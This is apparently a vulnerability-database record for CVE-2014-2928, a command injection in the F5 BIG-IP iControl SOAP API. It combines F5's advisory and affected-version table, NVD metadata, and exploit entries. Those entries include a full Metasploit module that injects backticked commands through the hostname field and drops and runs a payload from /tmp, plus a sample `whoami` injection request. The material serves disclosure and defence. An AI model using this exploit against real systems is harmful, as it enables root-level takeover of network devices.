ID F5:K15220 Type f5 Reporter f5 Modified 2019-05-08T19:30:00
Description
F5 Product Development has assigned ID 448802 (BIG-IP and Enterprise Manager) and ID 484170 (BIG-IQ) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, BIG-IP iHealth may list Heuristic H484322 on the Diagnostics > Identified > High page.
To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.
If the previous table lists a version in the Versions known to be not vulnerable column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.
Mitigation
To mitigate this vulnerability, you should permit access to F5 products only over a secure network and limit login access to trusted users.
F5 would like to acknowledge Brandon Perry of ZeniMax Online for bringing this issue to our attention.
{"id": "F5:K15220", "bulletinFamily": "software", "title": "iControl vulnerability CVE-2014-2928", "description": "\nF5 Product Development has assigned ID 448802 (BIG-IP and Enterprise Manager) and ID 484170 (BIG-IQ) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H484322 on the **Diagnostics **> **Identified **> **High **page. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.2.1 HF15 \n10.0.0 - 10.2.4 | iControl \nBIG-IP AAM | 11.4.0 - 11.5.1 | 11.6.0 \n11.5.2 | iControl \nBIG-IP AFM | 11.3.0 - 11.5.1 | 11.6.0 \n11.5.2 | iControl \nBIG-IP Analytics | 11.0.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.2.1 HF15 | iControl \nBIG-IP APM | 11.0.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.2.1 HF15 \n10.1.0 - 10.2.4 | iControl \nBIG-IP ASM | 11.0.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.2.1 HF15 \n10.0.0 - 10.2.4 | iControl \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF15 \n10.1.0 - 10.2.4 | iControl \nBIG-IP GTM | 11.0.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.2.1 HF15 \n10.0.0 - 10.2.4 | iControl \nBIG-IP Link Controller | 11.0.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.2.1 HF15 \n10.0.0 - 10.2.4 | iControl \nBIG-IP PEM | 11.3.0 - 11.5.1 | 11.6.0 \n11.5.2 | iControl \nBIG-IP PSM | 11.0.0 - 11.4.1 | 11.2.1 HF15 \n10.0.0 - 10.2.4 | iControl \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF15 \n10.0.0 - 10.2.4 | iControl \nBIG-IP WOM | 11.0.0 - 11.3.0 | 11.2.1 HF15 \n10.0.0 - 10.2.4 | iControl \nARX | None | 6.0.0 - 6.4.0 | None \nEnterprise Manager | 3.0.0 - 3.1.1 | 2.1.0 - 2.3.0 \n3.1.1 HF2 | iControl \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | 4.0.0 - 4.4.0 | None | iControl \nBIG-IQ Device | 4.2.0 - 4.4.0 | None | iControl \nBIG-IQ Security | 4.0.0 - 4.4.0 | None | iControl\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nMitigation \n\nTo mitigate this vulnerability, you should permit access to F5 products only over a secure network and limit login access to trusted users.\n\nF5 would like to acknowledge Brandon Perry of ZeniMax Online for bringing this issue to our attention.\n\n * [Metasploit module for testing](<https://www.exploit-db.com/exploits/34927>)\n\n**Note**: This link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "published": "2015-09-15T09:00:00", "modified": "2019-05-08T19:30:00", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}, "href": "https://support.f5.com/csp/article/K15220", "reporter": "f5", "references": [], "cvelist": ["CVE-2014-2928"], "type": "f5", "lastseen": "2020-04-06T22:39:39", "edition": 1, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2928"]}, {"type": "f5", "idList": ["SOL15220"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126546", "PACKETSTORM:128592"]}, {"type": "exploitdb", "idList": ["EDB-ID:34927"]}, {"type": "zdt", "idList": ["1337DAY-ID-22227", "1337DAY-ID-22734"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL15220.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_EXEC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105232"]}], "modified": "2020-04-06T22:39:39", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2020-04-06T22:39:39", "rev": 2}, "vulnersScore": 6.1}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T06:14:28", "description": "The iControl API in F5 BIG-IP LTM, APM, ASM, GTM, Link Controller, and PSM 10.0.0 through 10.2.4 and 11.0.0 through 11.5.1, BIG-IP AAM 11.4.0 through 11.5.1, BIG-IP AFM and PEM 11.3.0 through 11.5.1, BIG-IP Analytics 11.0.0 through 11.5.1, BIG-IP Edge Gateway, WebAccelerator, WOM 10.1.0 through 10.2.4 and 11.0.0 through 11.3.0, Enterprise Manager 2.1.0 through 2.3.0 and 3.0.0 through 3.1.1, and BIG-IQ Cloud, Device, and Security 4.0.0 through 4.3.0 allows remote administrators to execute arbitrary commands via shell metacharacters in the hostname element in a SOAP request.\nPer: http://cwe.mitre.org/data/definitions/77.html\n\n\"CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')\"", "edition": 4, "cvss3": {}, "published": "2014-05-12T14:55:00", "title": "CVE-2014-2928", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2928"], "modified": "2015-11-20T16:24:00", "cpe": ["cpe:/a:f5:big-ip_webaccelerator:10.0.0", "cpe:/a:f5:big-ip_edge_gateway:10.1.0", "cpe:/a:f5:big-ip_webaccelerator:9.4.1", "cpe:/a:f5:big-ip_protocol_security_module:10.2.2", "cpe:/a:f5:big-ip_application_security_manager:10.2.2", "cpe:/a:f5:big-ip_protocol_security_module:9.4.6", "cpe:/a:f5:big-ip_webaccelerator:10.2.4", "cpe:/a:f5:big-ip_protocol_security_module:9.4.5", "cpe:/a:f5:big-ip_global_traffic_manager:10.1.0", "cpe:/a:f5:big-ip_link_controller:10.0.1", "cpe:/a:f5:big-ip_wan_optimization_manager:11.0.0", "cpe:/a:f5:big-ip_application_security_manager:10.1.0", "cpe:/a:f5:big-ip_access_policy_manager:10.2.0", "cpe:/a:f5:big-ip_protocol_security_module:10.2.4", "cpe:/a:f5:big-ip_protocol_security_module:11.2.0", "cpe:/a:f5:big-ip_webaccelerator:11.3.0", "cpe:/a:f5:big-ip_global_traffic_manager:10.2.2", "cpe:/a:f5:big-ip_webaccelerator:9.4.6", "cpe:/a:f5:big-ip_access_policy_manager:10.2.2", "cpe:/a:f5:big-ip_webaccelerator:11.2.1", "cpe:/a:f5:big-ip_link_controller:10.2.1", "cpe:/a:f5:big-ip_global_traffic_manager:10.0.1", "cpe:/a:f5:big-ip_wan_optimization_manager:10.2.0", "cpe:/a:f5:big-ip_link_controller:11.0.0", "cpe:/a:f5:big-ip_access_policy_manager:10.2.1", "cpe:/a:f5:big-ip_local_traffic_manager:10.2.2", "cpe:/a:f5:big-ip_webaccelerator:9.4.3", "cpe:/a:f5:big-ip_webaccelerator:9.4.0", "cpe:/a:f5:big-ip_protocol_security_module:11.2.1", "cpe:/a:f5:big-ip_edge_gateway:10.2.0", "cpe:/a:f5:big-ip_wan_optimization_manager:10.0.0", "cpe:/a:f5:big-ip_link_controller:10.2.2", "cpe:/a:f5:big-ip_wan_optimization_manager:10.2.1", "cpe:/a:f5:big-ip_protocol_security_module:10.1.0", "cpe:/a:f5:big-ip_wan_optimization_manager:10.2.2", "cpe:/a:f5:big-ip_webaccelerator:11.0.0", "cpe:/a:f5:big-ip_protocol_security_module:10.2.3", "cpe:/a:f5:big-ip_protocol_security_module:10.0.0", "cpe:/a:f5:big-ip_local_traffic_manager:10.1.0", "cpe:/a:f5:big-ip_protocol_security_module:9.4.7", "cpe:/a:f5:big-ip_protocol_security_module:11.0.0", "cpe:/a:f5:big-ip_protocol_security_module:10.0.1", "cpe:/a:f5:big-ip_local_traffic_manager:10.0.0", "cpe:/a:f5:big-ip_webaccelerator:9.4.4", "cpe:/a:f5:big-ip_global_traffic_manager:10.0.0", "cpe:/a:f5:big-ip_local_traffic_manager:10.0.1", "cpe:/a:f5:big-ip_webaccelerator:10.2.0", "cpe:/a:f5:big-ip_protocol_security_module:11.1.0", "cpe:/a:f5:big-ip_local_traffic_manager:10.2.1", "cpe:/a:f5:big-ip_local_traffic_manager:11.0.0", "cpe:/a:f5:big-ip_application_security_manager:10.0.0", "cpe:/a:f5:big-ip_link_controller:10.2.0", "cpe:/a:f5:big-ip_application_security_manager:10.2.0", "cpe:/a:f5:big-ip_global_traffic_manager:10.2.0", "cpe:/a:f5:big-ip_access_policy_manager:10.1.0", "cpe:/a:f5:big-ip_protocol_security_module:9.4.8", "cpe:/a:f5:big-ip_protocol_security_module:11.4.0", "cpe:/a:f5:big-ip_application_security_manager:11.0.0", "cpe:/a:f5:big-ip_webaccelerator:11.1.0", "cpe:/a:f5:big-ip_webaccelerator:10.2.2", "cpe:/a:f5:big-ip_webaccelerator:9.4.8", "cpe:/a:f5:big-ip_global_traffic_manager:11.0.0", "cpe:/a:f5:big-ip_edge_gateway:11.0.0", "cpe:/a:f5:big-ip_webaccelerator:10.0.1", "cpe:/a:f5:big-ip_webaccelerator:10.1.0", "cpe:/a:f5:big-ip_protocol_security_module:11.3.0", "cpe:/a:f5:big-ip_webaccelerator:11.2.0", "cpe:/a:f5:big-ip_link_controller:10.0.0", "cpe:/a:f5:big-ip_application_security_manager:10.0.1", "cpe:/a:f5:big-ip_local_traffic_manager:10.2.0", "cpe:/a:f5:big-ip_wan_optimization_manager:10.0.1", "cpe:/a:f5:big-ip_global_traffic_manager:10.2.1", "cpe:/a:f5:big-ip_application_security_manager:10.2.1", "cpe:/a:f5:big-ip_webaccelerator:9.4.7", "cpe:/a:f5:big-ip_webaccelerator:10.2.3", "cpe:/a:f5:big-ip_link_controller:10.1.0", "cpe:/a:f5:big-ip_protocol_security_module:10.2.0", "cpe:/a:f5:big-ip_wan_optimization_manager:10.1.0", "cpe:/a:f5:big-ip_webaccelerator:9.4.5", "cpe:/a:f5:big-ip_webaccelerator:9.4.2", "cpe:/a:f5:big-ip_access_policy_manager:11.0.0", "cpe:/a:f5:big-ip_protocol_security_module:11.4.1", "cpe:/a:f5:big-ip_webaccelerator:10.2.1", "cpe:/a:f5:big-ip_edge_gateway:10.2.1", "cpe:/a:f5:big-ip_protocol_security_module:10.2.1", "cpe:/a:f5:big-ip_edge_gateway:10.2.2"], "id": "CVE-2014-2928", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2928", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:f5:big-ip_local_traffic_manager:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:10.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:9.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_edge_gateway:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_edge_gateway:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:10.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:10.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_edge_gateway:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:9.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:9.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_edge_gateway:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:9.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:9.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_edge_gateway:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:9.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:9.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:9.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:11.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:10.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:9.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_webaccelerator:9.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:10.0.1:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:23:12", "bulletinFamily": "software", "cvelist": ["CVE-2014-2928"], "edition": 1, "description": "Recommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 is responding to this vulnerability as determined by the parameters defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you should permit access to F5 products only over a secure network, and limit login access to trusted users. For additional information, refer to the links in the following **Supplemental Information** section.\n\nAcknowledgments\n\nF5 would like to acknowledge Brandon Perry of ZeniMax Online for bringing this issue to our attention.\n\nSupplemental Information\n\n * [Metasploit module for testing](<http://www.exploit-db.com/exploits/34927/>)\n\n**Note**: This link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL9502: BIG-IP hotfix matrix\n", "modified": "2015-09-14T00:00:00", "published": "2014-05-07T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html", "id": "SOL15220", "title": "SOL15220 - iControl vulnerability CVE-2014-2928", "type": "f5", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:43", "description": "", "published": "2014-10-08T00:00:00", "type": "packetstorm", "title": "F5 iControl Remote Root Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2928"], "modified": "2014-10-08T00:00:00", "id": "PACKETSTORM:128592", "href": "https://packetstormsecurity.com/files/128592/F5-iControl-Remote-Root-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"F5 iControl Remote Root Command Execution\", \n'Description' => %q{ \nThis module exploits an authenticated remote command execution \nvulnerability in the F5 BIGIP iControl API (and likely other \nF5 devices). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'bperry' # Discovery, Metasploit module \n], \n'References' => \n[ \n['CVE', '2014-2928'], \n['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'] \n], \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n['F5 iControl', {}] \n], \n'Privileged' => true, \n'DisclosureDate' => \"Sep 17 2013\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptBool.new('SSL', [true, 'Use SSL', true]), \nOptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']), \nOptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']), \nOptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']) \n], self.class) \nend \n \ndef check \nget_hostname = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> \n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<SOAP-ENV:Body> \n<n1:get_hostname xmlns:n1=\"urn:iControl:System/Inet\" /> \n</SOAP-ENV:Body> \n</SOAP-ENV:Envelope> \n} \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), \n'method' => 'POST', \n'data' => get_hostname, \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'] \n}) \n \nres.body =~ /y:string\">(.*)<\\/return/ \nhostname = $1 \nsend_cmd(\"whoami\") \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), \n'method' => 'POST', \n'data' => get_hostname, \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'] \n}) \n \nres.body =~ /y:string\">(.*)<\\/return/ \nnew_hostname = $1 \n \nif new_hostname == \"root.a.b\" \npay = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> \n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<SOAP-ENV:Body> \n<n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\"> \n<hostname>#{hostname}</hostname> \n</n1:set_hostname> \n</SOAP-ENV:Body> \n</SOAP-ENV:Envelope> \n} \n \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), \n'method' => 'POST', \n'data' => pay, \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'] \n}) \n \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef send_cmd(cmd) \npay = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> \n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<SOAP-ENV:Body> \n<n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\"> \n<hostname>`#{cmd}`.a.b</hostname> \n</n1:set_hostname> \n</SOAP-ENV:Body> \n</SOAP-ENV:Envelope> \n} \n \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'), \n'method' => 'POST', \n'data' => pay, \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'] \n}) \nend \n \ndef exploit \nfilename = Rex::Text.rand_text_alpha_lower(5) \n \nprint_status('Sending payload in chunks, might take a small bit...') \ni = 0 \nwhile i < payload.encoded.length \ncmd = \"echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}\" \nsend_cmd(cmd) \ni = i + 5 \nend \n \nprint_status('Triggering payload...') \n \nsend_cmd(\"sh /tmp/#{filename}\") \nend \nend \n`\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128592/f5_icontrol_exec.rb.txt"}, {"lastseen": "2016-12-05T22:21:52", "description": "", "published": "2014-05-07T00:00:00", "type": "packetstorm", "title": "F5 iControl Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2928"], "modified": "2014-05-07T00:00:00", "id": "PACKETSTORM:126546", "href": "https://packetstormsecurity.com/files/126546/F5-iControl-Remote-Command-Execution.html", "sourceData": "`Hi, \n \nLinked below is an advisory regarding remote command execution (as root, \npossibly) vulnerabilities within the iControl API: \n \nhttp://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html \n \n \nAn example request that will set the hostname to 'root.example.com': \n \n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> \n<SOAP-ENV:Envelope \nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<SOAP-ENV:Body> \n<n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\"> \n<hostname>`whoami`.example.com</hostname> \n</n1:set_hostname> \n</SOAP-ENV:Body> \n</SOAP-ENV:Envelope> \n \n \nThis was responsibly disclosed to F5 on the 7th of February. If you \nwould like the full communication timeline, feel free to ask. \n \n \n`\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126546/f5icontrol-exec.txt"}], "openvas": [{"lastseen": "2020-04-07T18:45:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2928"], "description": "F5 Big-IP is prone to an authenticated code execution vulnerability", "modified": "2020-04-03T00:00:00", "published": "2015-03-09T00:00:00", "id": "OPENVAS:1361412562310105232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105232", "type": "openvas", "title": "F5 BIG-IP - iControl vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - iControl vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 